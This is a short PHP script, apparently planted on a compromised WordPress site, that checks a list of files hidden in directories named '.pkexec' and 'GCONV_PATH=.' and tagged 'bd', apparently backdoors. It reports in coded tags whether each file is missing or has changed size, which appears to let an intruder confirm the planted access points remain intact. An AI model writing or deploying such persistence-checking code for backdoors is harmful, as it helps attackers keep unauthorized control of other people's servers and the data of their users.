<?php   $r = '/home/thebookpublishin/public_html'; $x = ["/wp-includes/.pkexec/GCONV_PATH=./login.php"=>"bd@@111937@@1573",
"/6910c6/.pkexec/.pkexec/stalled_issues.php"=>"bd@@111711@@1610",
"/6910c6/.pkexec/HostBlacklist.php"=>"bd@@111970@@861",
"/6910c6/GCONV_PATH=./rss_reader.php"=>"bd@@111994@@904",
"/6910c6/.pkexec/GCONV_PATH=./studying.php"=>"bd@@111752@@852",
"/wp-includes/.pkexec/GCONV_PATH=./login.inc.php"=>"bd@@111597@@1010"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!'); 